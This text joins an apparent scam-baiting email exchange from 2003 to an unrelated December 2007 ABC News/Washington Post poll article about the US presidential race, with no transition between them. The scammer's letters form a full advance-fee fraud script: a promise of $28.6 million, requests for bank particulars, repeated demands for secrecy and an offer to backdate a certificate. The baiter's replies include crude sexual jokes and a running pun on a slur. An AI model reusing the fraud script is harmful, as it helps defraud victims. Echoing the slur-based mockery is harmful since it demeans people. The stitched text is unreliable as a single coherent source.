It may interest you to know that two years ago a similar transaction was carried out with one Mr. Patrice miller , the president of craine international trading corporation at number 135 , east 57th street , 28th floor , new York , 10022 with telephone ( ( 212 ) ) 308-7788 and telex number 6731689 , after the agreement between both partners in which he was to take 5 % .
the money was duly transferred into his account only to be disappointed on our arrival in new York as we were reliably informed that Mr. .
Patrice miller was no longer on that address while his telephone and telex numbers have been reallocated to someday else , that is how we lost uss $ 27.5 m to Mr. Patrice miller .
This time around we need a more reliable and trustworthy person or a reputable company to do transaction with hence this mail to you , so if you can prove yourself to be trusted and interested in this deal , then we are prepared to do business with you .
What we want from you is the assurance that you will let us have our share when this amount of is transferred into your account .
To transfer this money into yours or Company 's account , a fresh file has to be opened here in your name or your company 's name .
Therefore we request you to furnish us with your banking particulars thus :
Your bank name and address , account number , name of beneficiary , telephone and fax Numbers of the bank , your company name and address , telephone , fax numbers .
This transaction is expected to be concluded within ( 10 ) bank working days on the receipt of your bank particulars ,
However , by virtue of our position as civil servants , we are not permitted by law to operate foreign account .
This is why we are asking for your assistance to provide the necessary documents to facilitate the transfer of this fund into any account you will nominate of course .
Meanwhile , for the fact that we are still in Government Service , I would want you to keep this deal top secret , both from friends and family members in order not to blow up the deal , which could jeopardize our career which we have laboured for in the past years .
As soon as the transfer is done , all related document to the transfer would be destroyed .
It is worthy to inform you that this transaction is entirely based on trust since this money is going to be into your own bank account .
Bear in mind that this is absolutely a private and personal deal , not official , and hence should be treated with all measures of secrecy and absolute confidentiality .
When we receive the above information from you by email , we shall apply and obtain the necessary payment approvals from the relevant authorities including the Federal Ministry of Finance ( F.M.F ) which shall allocate you or your company foreign exchange cover for US $ 28.6 MILLION you or your company shall be officially regarded as the beneficiary of the fund .
However , your prompt reply will enable us to expedite action by forwarding the information ( your bank particulars ) to the authority concerned for immediate Processing of the approval document / remittance .
At any stage of development , we shall send you copies of all the documents for your perusal until the amount reflects in the government 's schedule list for payment , then representatives of the group will come to your country to man our share of the proceed , part of our own share could be use to set up a foreign trade , which will also be supervised by you as a partner .
Should you be interested in this arrangement and this proposal is acceptable by you , do not make undue advantage of the trust we have bestowed on you and your Company , kindly get to me immediately on my E-mail Address as stated above .
Let 's trust that absolute confidentiality be our watchword throughout this business transaction .
Your line of business does not matter in regard this transaction .
Your immediate response will be highly appreciated .
I wait for your call for more details
Best Regards ,
ENGR .
JOHN ADEMOLA ( MNSE )
Phone:234-80-332-48217
[ A change of john 's email address , but lets ignore it ]
From : Gillian Anderson
To : John Ademola Dearest John ,
Your email is most welcome , and your proposition seems to be a good one .
However , before I proceed to send you my details I would prefer to wait until I receive some formal identification from you .
I hope that this is not a problem .
For your information , I own a modelling company ( I am unmarried , so go for it stud ) , and my job takes me all over the world , but mainly to the US and UK , and I enjoy the travel and lifestyle of full - time modelling .
I also enjoy porno movies , both watching and appearing in them .
Please find an image of me attached for your records .
Should you require it , I will be happy to supply my passport once I have received your information .
Please not that due to an accident whilst on a modelling assignment in 1987 , my hearing was damaged and is now 90 % impaired , therefore I cannot use a standard telephone , therefore , I will only be able to communicate vie email or fax .
I hope this does not present a problem .
I was lying naked in a swimming pool whilst the photographer was on a balcony above taking photographs ; unfortunately his camera strap snapped and the camera plunged 30 feet and clipped me on the side of the head .
Ever since then my hearing has been virtually non-existent .
Also please note that on Wednesday ( 3rd September ) I am at a launch party for a new magazine which is being launched ( I am on the front cover ! ) so I will be unavailable via email or fax on that day .
My very best wishes ,
Gillian .
Clockzone Modelling
Gillian Anderson Date : Mon , 1 Sep 2003 07:53:10 - 0700 ( PDT )
From : " john ademola "
Subject :
Thanks sister here i attach my photo Dear sister Gillian
How are you ?
Compliment of the day .
I feel delighted to write you once more .
However , I sincerely thank you for your quick response to my mail , I will advise we use email and fax from now onward , I am very sorry for the accident that happened to you during your modeling assignment in 1987 .
[ Thanks for your concern John ]
I got your mail my good friend and the content were well noted , my friend in regard your request for my identification , with all pressure I will send to you my photo now .
I am also happy you are truly a trustworthy fellow one can always rely on at any given time in life due to your questions regards this transaction .
Please sister I would be very grateful if you answer me this questions as follows :
How old are you ?
Are you sure that your account will accommodate this contract amount ?
I assured you that this transaction is 100 % risk free as we have concluded every arrangement to protect the interest of every one involved .
Likewise , all modalities [ !] for the successful transfer of this money have been worked out .
Please I do not need to remind you of the need for absolute Confidentiality if this transaction must succeed .
Due to my sensitive position in the Nigerian Government ,
Let 's trust that absolute confidentiality be our watchword throughout this business transaction .
Your line of business does not matter in regard this transaction .
Your immediate response will be highly appreciated .
Best Regards ,
ENGR .
JOHN ADEMOLA ( MNSE )
Phone:234-80-332-48217
" John Ademola " From : Gillian Anderson
To : John Ademola My Dear Mr. Ademola ,
Thank you for your email .
Please note that I have just received a fax from a colleague , and it seems that the fax machine is not working correctly .
The engineer tells me that a rat has somehow got caught up in the workings ( I hate those little bastards ) .
If you need to send me any documents , please send them as email attachments for the moment .
As for your questions , my age is 27 and I 'm one hot babe .
As my company currently earn in excess of 4.2 million dollars per year , I am sure that my account is more than adequate to deal with a large sum such as yours .
If there 's one thing I can handle , it 's large loads .
Please Mr. Ademola , thank you for your picture , but it is quite small and I can not see your face very clearly .
Please would you send me another photo ?
I await your instructions .
Kindest regards , Miss Gillian Anderson .
Date : Mon , 1 Sep 2003 10:14:11 - 0700 ( PDT )
From : " john ademola "
Subject : please sister send down the info .
so that we can move forward , here i attach my picture Dearest sister ,
How are your families ?
I got your mail request I send another picture because the one that I have just sent to you is not clear .
Sister without much delay I attach here my full posture for your viewing , but I want you to understand that this scan picture which will not be all that clear for your viewing .
At this juncture sister I would have advice you send the information 's I requested from you now for us to get started as soon as this transaction come to a successful conclusion , definitely we shall meet face to face in your country for the shearing of the proceed .
I am happy to read from your mail that your account is enough to accommodate the said fund .
My sister I will be very grateful if my request is welcomed by your person and you send down the information 's probably today so that tomorrow I can ask my mentor to submit / file an application for the approval and release / transfer of the fund into your desired bank account from the authorities concern .
Sister regards your fax machine that is faulty , I would have advice you take it to technician immediately so as to rectifier the fault , this is very important because the authorities concern regard the approval of this contract fund will not send to you any document by email attachment .
Thanks for your understanding in this regard , I will also like if you can send to me your photo for my viewing when replying this mail .
I am looking forward to receive the requested information 's you soonest .
Hope to be with you soonest , may the good God guide you as you read this mail and understand the position of things .
Your immediate response will be highly appreciated , Say me well to your friends ; remain blessed !
Yours sincerely ,
ENGR .
JOHN ADEMOLA ( MNSE )
Phone:234-80-332-48217
" John Ademola " From : Gillian Anderson
To : John Ademola My Dear Mr. Ademola ,
Thank you one again for your email .
It was nice to receive it .
Thank you also for your picture .
Please if possible next time , try to make your pictures a little larger .
I have attached another photograph of me for you to drool over .
I will send you another one soon .
The engineer has told me that the fax machine will have to be taken away to be repaired and rat guts removed , so if you need to send any documents then you will for the moment have to send them as email attachments .
I will advise you when the fax has been repaired .
My Bank details are as follows :
Bank Name :
Plunder & Flee Incorporated
331 Offmerip Gardens
Stabmeintheback St .
London W4
England
Fax : +44 171 889 24538
Account No : 10012133-194
Sort Code : 22-14-77
Beneficiary Name : Miss Gillian Anderson
Company details
Clockzone Ltd ( Modelling Agency )
203-207 Ex Files Gardens
Duchovny St .
London W4
England
Tel : ( TextPhone ) +44 171 837 66319
Fax : +44 8701 3XX XXXX
I hope this information is of help .
Sorry , but I have to end this email here as the vermin exterminator is here and he needs to use his flame - thrower .
Kindest regards ,
Gillian
Clockzone UK .
Gillian Anderson [ John takes a shine to me ]
Date : Tue , 2 Sep 2003 04:36:39 - 0700 ( PDT )
From : " john ademola "
Subject : THANKS FOR THE INFO .
MY SWEET ANGLE
Dear sweet angle , [ Angle ?
Would that be 90 degrees or 45 degrees ?!]
How are you and your family ?
Hope fine thank be to the God almighty , I got your mail in regarding my your bank information 's and your picture .
Sister thank very much for your quick reply , and I will not fail to let you that you are very beautiful , infect you are an ANGLE !
Please sister from today onward I will be addressing you as sweet angle .
Sister I am very sorry that I could not hear your sweet voice over the phone , I cause that accident that happened to you , please bear with me for I fell for you .
I am also happy you are truly a trustworthy fellow one can always rely on at any given time in life due to your questions / carefulness regards this transaction .
Sequel to your request I fax if i have to fax any document now that i should scan and sent to you ?
I have to use the job completion certificate with me now to validate and obtain / back date a new job completion certificate on your name and of company as the beneficiary that executed this contract in the year 1999 as I have the old certificate and nobody knows about this development .
My sweet angle I will be very happy if to hear soonest that the engineer has been through with the fax machine so that we do not have any delay regard receiving the approval documents of this fund from all the ministries concerns .
My friend you know that this a deal do not worry for I have done the underground work for the for the successful transfer of this money , all I need is your support .
As soon as I obtained the new certificate I will fax it to you immediately .
Would you like to register your company as a subsidiary contractor here in Nigeria ?
I have to appoint an attorney on your behalf that will follow up this transaction I will pay him for his legal professional fee , because I am a government official , I do n't want anybody to know my involvement in regard this transaction .
I will tell the attorney that you are my old friend from LONDON Who executed a contract with my corporation ( NNPC ) that you ask me to secure an attorney that will assist you get the approval of this fund into your bank account
The attorney will proceeded and he shall be given you reports on his dealings .
At any stage of development , the lawyer shall send you copies of all the documents for your perusal until the amount reflects in the government 's schedule list for payment , then representatives of the group will come to your country to man our share of the proceed .
Should you be interested in this arrangement mail me immediately .
Lets trust and absolute confidentiality be our watchword throughout this business transaction .
Thanks while I await your immediate response .
Best Regards ,
ENGR .
John Ademola
Telephone No : 234-80-332-48217 NB
:
Like you said that you will be off mail tomorrow , I wish you the best of luck and god 's protection wherever you went my sweet angle .
Date : Tue , 2 Sep 2003 04:38:50 - 0700 ( PDT )
From : " john ademola "
Subject : FORWARDING OF YOUR INFORMATIONS
Dear sweet angle .
My sister i want to bring to your notice that my mentor have this morning forwarded the letter of claims including your name / bank and of your company to the appropriate quarter concern for the immediate approval of the fund in your favour .
I am happy to inform you that your name and your company 's has been encoded in the Federal Ministry of Finance ( FMF ) computer , thereby , making you the bonafide owner of the Twenty Eight Million , Six Hundred Thousand United States Dollars , ( USD $ 28,600,000.00 )
I have been assured by my mentor in the ( FMF ) that the final approval must be ready as soon as possible .
Thereafter , the fund will be released to you by the Apex Bank of Nigeria ( CBN ) through telegraphic transfer into your nominated bank account in London - England .
As soon as you receive any document / correspondence or phone call from any organization or an individual from Nigeria , you should not respond until you notify me so as to enable me advise you on what to do .
THIS IS AN IMPORTANT INSTRUCTION WHICH MUST BE ADHERE TO .
You are expected to keep this transaction TOP SECRET at all times until the money has arrived your bank account .
Remember we are still in Government Service and will not want anything to Jeopardize our career .
You should endeavor to keep me updating always so as to give me information on every stage of development concerning this transaction .
You should also bear in mind that any expenses we might incurred during the cause of this transaction will be taken care by 5 % set aside for expenses .
On this note , you are advised to keep records of all your expenses since the 5 % will be shared according to the ratio of our expenses , and 30 % will be given to you as the owner of the account used , while 65 % is for me and my colleagues .
As soon as you confirm the money in your bank account , you MUST notify me so that i and one of my colleague will come down to your country to collect our share of the fund .
and part of our share will be used to set up a business which you as a partner will be inspecting for us over there .
Please mail me back immediately you receive this mail .
Thanks while I await your immediate response Best Regards , ENGR .
John Ademola
Telephone No : 234-80-332-48217 From : Gillian Anderson
To : John Ademola
My dear John , Many thanks for your very sweet email , it was very touching to me , in fact I am touching me as I write this ( hard to do I can tell you ) .
Yes , it is a pity that I cannot talk to you over the telephone , but hopefully we will meet soon .
Please try to find a bigger picture of yourself to send to me .
For every picture you send to me I will send one from me .
Your other pictures are to small .
Your face looks nice , but I cannot see the pictures clearly as they are too small , and I want to make sure you are not a hideous pox-ridden specimen of a man , like my last boyfriend Brad Pitt .
Please for the future send any needed documents via email attachment , and I will also do the same .
You may register my company , Clockzone Modelling Inc. if you feel that it would help to complete this transaction quickly .
Please instruct your lawyer to proceed at his will .
I will leave you for now my John .
I will be back tomorrow evening after the magazine has finished taking my photographs for their cover .
I am excited ; the photographer has promised me a pearl necklace if I do well .
Take care , Gillian .
Clockzone Modelling Inc. Date : Wed , 3 Sep 2003 04:59:19 - 0700 ( PDT )
From : john ademola
Subject : HAPPY OUTING TODAY MY SWEET ANGLE Dear sweet angle How is your outing regarding the magazine coverage ?
I want to bring to your notice that I have this morning send the total sum of $ 15,610 .00 through my mentor to the lawyer Barrister John Chikwuma , of John Chikwuma & associates , regard the Registration of your company ( Clockzone Modeling Inc. ) as a subsidiary contractor and to obtain other relevant documents that will help to complete this transaction quickly .
My angle I want to reminder you once again that i told the attorney that you are my old friend from LONDON Who executed a contract with my corporation ( NNPC ) that you ask me to secure an attorney that will assist you get the approval of this fund into your bank account .
At this juncture you should not let the lawyer or any official / ministry to know my involvement in this transaction until it comes to a conclusion .
Moreover the attorney shall be given you reports on his dealings and you will be up dating me as your partner , because I can not ask the attorney any question regards this transaction from now onward to avoid suspicious .
At any stage of development , the lawyer shall send you copies of all the documents for your perusal until the amount reflects in the government 's schedule list for payment .
As soon as you receive any document / correspondence or phone call from any organization or an individual from Nigeria , you should not respond until you notify me so as to enable me advise you on what to do .
THIS IS AN IMPORTANT INSTRUCTION WHICH MUST BE ADHERING TO .
You are expected to keep this transaction TOP SECRET at all times until the money has arrived your bank account , do not disclose this transaction to your bank at this stage until the fund is transferred into your account and you will be backed up with all the necessary documents of claim .
You should endeavor to keep me updating always so as to give me information on every stage of development concerning this transaction .
As soon as you confirm the money in your bank account , you MUST notify me so that i and one of my colleague will come down to your country to collect our share of the fund and part of our share will be used to set up a business which you as a partner will be inspecting for us over there .
Please mail me back immediately you receive this mail .
Thanks while I await your immediate response Best Regards ,
ENGR .
John Ademola
Telephone No : 234-80-332-48217 From : Gillian Anderson
To : John Ademola My dearest John ,
Many thanks for your wonderful letter , and I look forward to more from you .
Please John , why do you not send me a LARGE photograph of yourself - I need to be wet .
The others are too small for me to see you clearly .
I have sent you another picture of me , and I will send more sexy ones if you will send me a good image of yourself - I have great tits ; at least that 's what my father says .
Please John , you can be assured 100 % of my confidentiality .
Take care ,
Gillian .
Gillian Anderson Date : Wed , 3 Sep 2003 12:23:51 - 0700 ( PDT )
From : john ademola
Subject : THANKS FOR YOUR MAIL AND PICTURE , PLEASE DID YOU HEAR FROM THE LAWYER ?
Hello sweet angle [ Will somebody PLEASE get this guy a dictionary ! ]
I got your mail and your request I send to you my lager photo for your viewing , my dear angle I would have send to you my photo again if I have one at my reach now , but I want you to understand that I am a handsome looking man [ I think later on we are about to find out that John is what is technically known as , ' a lying bastard ' ] and a director with ( NNPC ) , do not bother yourself about my postures because very soon we meet face to face and have diner / wine together in your country .
My dear angle the reason why I do not have much posture of myself - alone is I am a public figure , most of my pictures where group pictures and most of all is video coverage , please bear with me my sweet angle .
I want to bring to your notice that there was a proverb , ( which say that , it is nice for a queen to follow corner way to enter kings palace ) that is to say as far as we are going to meet face to face soonest , please dear picture or no picture for now let us join hand / rob [ ?!] mind together to the succeed of this transaction .
My sweet angle I am not saying that you should stop sending your pictures to me , I welcome your posture at any giving time , because I like / love to see you at all times .
My angle if I may forget how is your outing today ?
Have you been contacted by the lawyer ?
Because I have advised him to proceed and I have send to him some money to execute his duty on your behalf .
Please you are to inform me as soon as your fax machine is ok .
I am happy to hear that you assured me 100 % of confidentiality .
My dear angle mail me back once you receive this mail .
Best regard
Engr . John Ademola From : Gillian Anderson
To : John Ademola Dear John ,
I think you have something to hide .
I am attaching one last picture for you to this email then you will hear no more from me .
You only seem interested in my money or help and you have no time for me and do not want to send me your picture .
This saddens me John .
Goodbye ,
Gillian .
Gillian Anderson Date : Thu , 4 Sep 2003 05:29:41 - 0700 ( PDT )
From : john ademola
Subject : TO MY SWEET ANGLE Dear My Sweet Angle , I got your mail with a great shock of mind .
Let me tell categorically that i am not much interested in your money , but for you in particular .
Due to the business we are into that make us to know ourselves is God sent which we both of us will benefit from it soonest .
I am not hiding anything for you to be very sincere , i am a director with Nigerian National Petroleum coporation , 35 years old married with one child but divioced in year 2002 , since then i have not made any other choice of another wife , but because i came in contact with you i think i will give it a trial .
I believe by next week ending this funds will be in your account , i will then travel to meet with you so that we can sort things out .
Below is my photograph .
Bear with me my dear angel .
My dear angle mail me back once you receive this mail .
Best regard
Engr . John Ademola
Oh dear - An enlarged version of his first pic .
Slapping time !
From : Gillian Anderson
To : John Ademola Dearest John ,
Your emails are welcomed , and thank you for putting my mind at ease with regards to some things .
Dear John , please forgive me , for at the moment my dearest pet dog died this morning .
My dog was with me for many many years , and since I have not yet been married he was a close friend to me .
My dog was called Fags , named after my great Uncle George Fagsinder Anderson .
Fags had been suffering for some weeks now ( he was coughing a lot recently ) and his death was expected but it still comes as a great shock to me .
Without Fags , my life feels empty at the moment .
I really loved my pet , and I am not certain how I am to continue without Fags .
Sorry to keep going on about a silly thing like Fags , but until you know the feelings I have , you will never know how hard it is to be without Fags .
My dearest John , I am unhappy also with picture you sent to me .
They are the same picture that you sent to me before but you have enlarged it .
This makes me even more unhappy , and I feel I can not trust you .
Are they your real pictures , or are you trying to keep your real identity secret because you do not trust me , or are you dead ?
Please John , do not be afraid to reveal your true self to me .
Looks are not important to me , but friendship and trust is .
Now that I have to live without Fags I am in real need of somebody I can trust ; I hope it is you .
Do you think you can be a substitute for Fags ?
I feel sure that you can become my new Fag .
I am going to have to ask you to do one thing for me to prove your honesty to me .
I need you to get a real photograph sent to me , but this time to prove that you are not sending me a false image I need you to hold a sign that shows the image must be you .
Please John , will you take your photograph holding a sign for me ?
Will you pay respects to my dear departed pet by holding up a sign ?
I would like you to hold up a sign that says " I LOVE FAGS " .
That way I know that the photograph is true because nobody else will know to do this .
If you can do this for me then I know for certain you must be a true and gentle man .
Without this proof I am sorry but I cannot proceed any further .
Please , for the memory of my Fags , do this one thing for me my dearest .
I have to leave now dear John .
I have to arrange the burial for my beloved pet and the funeral director is asking for Fags .
Your love , Gillian Anderson .
Gillian Anderson Date : Fri , 5 Sep 2003 10:11:56 - 0700 ( PDT )
From : john ademola
Subject : MY SWEET ANGLE I AM SORRY FOR FAG'S DEATH TAKE HEART Dear sweet angle [ FFS ! ]
I got your mail and I am very sorry to hear the death of your lovely pet Fags .
It is a pity that I can not talk with you on phone , I would have tell you what and how I fell for the death of fag .
Hence I send this mail to you .
I am sorry for my late replying ; it is because I went out early this morning to inspect a new site for my corporation ( NNPC ) .
My dear angle you wish is my command I will do exactly what you want regard fag 's death .
To show my concern for you and fag .
My dear sweet angle all the pictures that I have sent to you is my real image and to prove to you that I love you and not happy for fag 's death I will snap a new picture today and send it across to you as you requested , to hold up a sign that says " I love Fags " [ YEAY ! ] because your happiness means much to me now that you have no friend expect me .
I have to leave now my sweet angle .
I have to and arrange with the photographer , which I will send to you by tomorrow as soon as I receive the copy from the photographer .
My dear sweet for the fact that I do not know much about scanning works because I am petrochemical engineering and I can not take my picture to anybody else to do the scanning for me do to the nature of this transaction .
But I will do my best my sweet angle bear with me .
My dear sweet angle , one more things that I would n't want to be hearing / reading from your mails to me is ( if you done do this , I cannot proceed any further . )
You should remember that this transaction is a god sent that brought us together and should be regarded at all times , because we both will benefit from it .
My dear angle there is something I have in mind to tell you but not until we meet face to face in your country , which will be soonest .
Please except my condolence for the death of fag , may the Good Lord gives you the mind to bear the grate lost .
Hope to be with you soonest .
Thanks while I await your immediate response .
Your lover , [ EURGH ! ]
ENGR .
John Ademola
Telephone No : 234-80-332-48217 From : Gillian Anderson
To : John Ademola Dearest John ,
Thank you for your thoughts about my pet .
I know such things may be silly to you , but for me my Fags was a lifelong companion .
As I am not married Fags was very close to me , and with me all the time .
You could say I was addicted to Fags .
Thank you for trying with the picture .
It is very important to me that I find someone who I can trust 100 % Please be sure to make the image as large as possible so that your sign of truth is clear .
I will be VERY grateful to you for a big , clear image .
I will not tell you now what I will do for you , but it will make you very happy !
As soon as your picture is received I will complete this transaction ASAP .
I have attached a picture of my beautiful departed friend Fags .
I hope you like Fags too .
Your love , Gillian .
" Fags " Date : Sat , 6 Sep 2003 11:09:13 - 0700 ( PDT )
From : john ademola
Subject : FOR THE MEMORY OF FAG'S DEATH / PLEASE SWEET HEART HAPPY WEEKEND
Dear sweet angel .
[ ALERT THE PRESS - He got it right !]
How are you today ?
I hope that fag 's death is not causing too much disturbances to your life ?
Please my dear sweet angel do not feel bad about this incident for it is not your wish but the devil .
I will not fail to tell you how i feel to hear fag 's death , although i did not see / know fag but hence the death toches your heart i feel the same .
My dear sweet angel i am attaching this picture for the memory of fag 's death to please my sweet angel .
My dear now that you have lost your life long companion do not worry much for you have found someone dear to you , that is me {I WILL BE ANYWHERE FOR YOU TO MAKE YOU HAPPY} this is my word of advise for you .
May his or her soul rest in perfect peace AMEN !!
Please i want to ask you this question , I know such question may be silly to you , but i am serious , Have you been proposed for marriage by any man as of now ?
I want you to have me in mind from now onward because i want to be closer to you .
Please except my condolence for the death of fag , may the Good Lord gives you the mind to bear the grate lost .
Hope to be with you soonest .
Thanks while I await your immediate response .
Your lover ,
ENGR .
John Ademola
Telephone No : 234-80-332-48217
John sends me this picture with a cut & pasted head !
" John Ademola "
From : Gillian Anderson
To : John Ademola Dearest John ,
How can you do this to me ?
I thank you from the bottom of my heart for the beautiful message that you wrote , but WHY oh WHY have you disguised the head ?
It is quite plain to me that you have put another head on top of the original photograph .
John , I am in tears as I write .
I am now wet .
I was starting to trust you and now you do THIS ??
Please john , it does not matter to me what you look like .
As I have said before , your looks are not important to me .
Because I am a model , I have always had handsome men coming after me , but they have ALL let me down once they did me doggy style .
The only thing I could ever trust is Fags .
I know the picture is false .
I work with photographers nearly every day , so please be honest with me .
Dear John , it seems that you are another of these bad men who will treat me badly and be bad to me , which is bad , and I hate bad .
[ You follow that ?!]
Gillian .
Date : Sun , 7 Sep 2003 08:55:00 - 0700 ( PDT )
From : john ademola
Subject : I WILL BE THE LAST MAN TO TREAT YOU BAD / HURT YOUR SOUL .
Dear angel
My dear angle I got your mail , and all the content of your mail were well noted my dear angel .
My dear angel to satisfy your mind and mine as partner to be in future , WHAT DO YOU WANT ME TO DO AT THIS PRESENT SITUATION ?
To please you .
I am now getting real that you love me my sweet angel ..
Please very urgent reply .
Your lover John From : Gillian Anderson
To : John Ademola Dearest John ,
I need you to send me the picture of you holding the message for Fags again , BUT this time I NEED to see your REAL face my love .
Please do not let me down .
Kindest ,
Gillian .
Gillian Anderson Date : Mon , 8 Sep 2003 04:40:57 - 0700 ( PDT )
From : john ademola
Subject : FOR MY LOVE FOR YOU AND FAG'S Dearest sweet angel How are you today ?
My sweet angel Let 's trust that absolute confidentiality be our watchword throughout this business transaction .
Regard your request from me , this is to prove my honest / love I have for you hence I send to you these two pictures for your perusal and safe keeping .
Please my angel now that you have my photo I believe that we can proceed further as future partner to be and finalize this transaction as soon as possible .
My plan / intention is as soon as this fund is transferred / confirmed into your account ; I will file an application letter for my resignation to the appropriate ministry concern as a civil savant with my government and come over to stay with you .
Or what do you think ?
Have you been contact by any of the ministries regarding the approval of this fund in your favour ?
Have the lawyer sent to you any of the documents ?
At any stage of development , the lawyer shall send you copies of all the documents for your perusal until the amount reflects in the government 's schedule list for payment .
As soon as you receive any document / correspondence or phone call from any organization or an individual from Nigeria , you should not respond until you notify me so as to enable me advise you on what to do .
THIS IS AN IMPORTANT INSTRUCTION WHICH MUST BE ADHERING TO .
You are expected to keep this transaction TOP SECRET at all times until the money has arrived your bank account , do not disclose this transaction to your bank at this stage until the fund is transferred into your account and you will be backed up with all the necessary documents of claim .
You should endeavor to keep me updating always so as to give me information on every stage of development concerning this transaction .
Please except my condolence for the death of fag [ FAGS !
FAGS !
FAGS !
It 's " Fags " you idiot ] may the Good Lord gives you the mind to bear the grate lost .
Please mail me back immediately you receive this mail .
Thanks while I await your immediate response
Your lover ENGR .
John Ademola
Nb : please is dear any means we could talk on phone , because I am egger to hear your voice anyhow .
John Ademola # 1
John Ademola # 2 From : Gillian Anderson
To : John Ademola
My dearest John , I thank you from my heart for sending me you new photographs .
You look like a very sweet and gentle man [ Actually , the first words that came to my mind were " complete " and " dork " ] and I know that my trust in you will remain .
The lawyer did contact me my darling , but when I was so sad at the death of Fags I have deleted all of my emails , so I do not have a copy of the letters .
Please ask him to contact me again to send any needed documents to me .
[ Just to make him work a little harder ]
Please my love , tell the lawyer to be sure to print your name in the subject so that I can easily know who it is from .
Please , let me know what you would like me to do now .
Thank you again for your thought for Fags .
It is nice to know that you have always got Fags on your mind .
I know you must me a warm caring man , and I will reward you soon for your hard work .
I am so happy that you love Fags !
Dearest John , you can try to call me , but you will have to talk loudly and slowly .
If I am not home , please leave a message on my answer phone .
Please note that because I get so many strange calls , you will need to say a password when leaving a message so that I know it is you .
Before you leave any message , you must say the passwords " I love Fags " , then I know it will be you .
My telephone number is 001 206 XXX XXXX ( this includes the country dialling code ) .
Please remember that this is my private US telephone number , but if I am available the call will be forwarded to whatever location I am at .
I have sent another picture for you dearest John .
It is a quite sexy picture so I hope you like it !
Forever , Gillian .
Gillian Anderson
Should the pink pixel be ...
or ?
Dec. 11 , 2007  --
The interaction of religion and politics is helping to roil the Republican presidential race , with Mike Huckabee and Mitt Romney gaining ground , while support for Rudy Giuliani , down especially among conservatives and highly engaged voters , has slipped to its lowest level of the year .
With a rally among evangelical Protestants , Huckabee 's advanced sharply in this national ABC News / Washington Post poll , while Romney 's made some progress allaying concerns about his Mormon religion .
Along with Giuliani 's diminished lead , his one - time chief competitors , John McCain and Fred Thompson , are near their own lows .
The upheaval reshapes the possibilities in the Republican contest , reflecting an electorate whose core groups have been uneasy with Giuliani and McCain , and uninspired by Thompson .
Among Republicans and Republican - leaning independents , who say they 're certain to vote , 25 percent in this poll support Giuliani , 19 percent Huckabee , 17 percent Romney , 14 percent Thompson and 12 percent McCain .
Huckabee 's support has doubled from last month , while Giuliani 's lost nine points .
And while Giuliani retains a lead , it 's nothing like his glory days early this year -- 53 percent in an ABC / Post poll last February , 30 points ahead of then - No .
2 McCain , with more modest double - digit leads subsequently .
Giuliani has dropped to 19 percent support among conservatives , a core Republican group uneasy with his backing of legal abortion and gay civil unions .
He 's down most sharply , by 20 points , among Republicans who are following the race very closely ; they 've shifted to Huckabee and Romney .
And after two weeks on the defensive , Giuliani has lost considerable strength among his existing supporters : Just 28 percent of them now " strongly " favor him , down from 45 percent a month ago .
ISSUES : There 's also a growing issue in the 2008 campaign , namely , the economy , which for the first time has surpassed the war in Iraq among the top two issues cited by likely voters .
Among all Americans , 44 percent now say the economy 's one of the top issues in their vote for president , up 15 points from last month ; 37 percent name Iraq , down eight .
Just 28 percent , moreover , say the economy 's in good shape , the lowest number since early 2003 .
Economic discontent can be a powerful political force , particularly if it finds a focus for blame .
DEMOCRATS : Unlike the Republican contest , this poll finds no upheaval in national preferences in the Democratic race , where , again among likely voters , Hillary Clinton leads Barack Obama by more than 2 - 1 , 53 - 23 percent , with John Edwards at 10 percent , all essentially the same as last month .
This poll was conducted Thursday to Sunday , including interviews through the weekend when television personality Oprah Winfrey campaigned for Obama in Iowa , South Carolina and New Hampshire .
It found no bump in support for Obama in Saturday and Sunday interviews ; indeed , Democrats and Democratic - leaning independents are as likely to say Winfrey 's endorsement makes them less likely to support Obama as more likely .
Eighty - two percent say it makes no difference in their vote .
In a related result , just 5 percent of Americans overall say they put a great amount of weight on endorsements by entertainment figures or other celebrities .
Vastly more rely heavily on the candidates ' positions on the issues ( 65 percent ) , personal qualities ( 58 percent ) and professional abilities ( 54 percent ) .
Religion and spouses also are well back in importance , albeit ahead of celebrity endorsements .
BUSH / IRAQ : Then there 's President Bush , inching closer to Harry Truman 's record as the postwar president to linger longest without majority public support .
Just 33 percent approve of Bush 's job performance , matching his career low .
It 's been less than a majority for 35 months straight ; the record was Truman 's 38 months , from 1949 - 1952 .
Bush 's approval rating , depressed by the unpopular war in Iraq , has stayed remarkably flat , 33 to 36 percent in 10 ABC / Post polls the past year .
In terms of intensity , strong disapprovers continue to outnumber strong approvers by a 3 - 1 margin .
Given reduced violence in Iraq , some views of the war have shifted , but not enough to change bottom - line attitudes .
Forty - one percent believe the United States is making significant progress in Iraq , up from a low of 31 percent a year ago .
But still , 61 percent say the war was not worth fighting ; its strong opponents outnumber its strong supporters by 2 - 1 and 65 percent continue to disapprove of how Bush is handling it .
He has n't seen majority approval for handling the war since January 2004 , nearly four years ago .
ELECTION : Bush 's flat lines have likely helped make the 2008 race the focus of political attention , along with the fact that it 's the first time since 1928 that neither the sitting president nor vice president sought his party 's nomination .
Seventy - two percent of Americans say they 're following the contest closely , a new high in this cycle and far higher than the 45 percent number at this point in the last nonincumbert election , in 2000 .
Democrats are more fired up .
They 're 10 points more apt than Republicans to " strongly " support a particular candidate .
And given the president 's long - running unpopularity , an overall decline in Republican allegiance continues .
On average this year , just 25 percent of Americans have identified themselves as Republicans , down from a peak of 31 percent in 2003 and the lowest number since 1984 ( when , it should be noted , Ronald Reagan was re-elected regardless , over a weak Democratic opponent ) .
But the sharper tone of the campaigns in recent weeks may be souring some voters .
" Strong " support for candidates is down in both parties , now 44 percent , among leaned Democrats , down steadily from a peak of 63 percent in July ; and 34 percent among Republicans , down from a high of 45 percent in September .
GOP CANDIDATES :
In the Republican race , Giuliani has lost support particularly among men ( down 14 points ) and among independents , who lean toward the Republican Party ( down 17 points , while both Huckabee and Romney are up by 10 points in this group ) .
Giuliani's also lost nine points among conservatives , and now is running about evenly with Huckabee and Romney in this group .
That 's Giuliani 's lowest of the year among conservatives , and it compares with his 36 percent support from moderates and the few liberal Republicans .
His challenge is that conservatives dominate ; they account for six in 10 Republicans and Republican leaners .
Giuliani's greatest decline , as noted , has been among people who are following the race very closely , people perhaps more likely to be tuned in to recent questions about matters such as police security for his then - girlfriend when he was New York City mayor , and the identity of his security consulting firm 's business clients .
Huckabee , governor of Arkansas and a Baptist minister , first caught on in Iowa , where an ABC / Post poll just before Thanksgiving found him challenging Romney , who 's focused heavily on the state .
Huckabee subsequently advanced in national polls , albeit not in New Hampshire , where he had just 9 percent support in an ABC / Post poll last week .
Huckabee 's support in this national poll is up by 10 points among likely voters from last month .
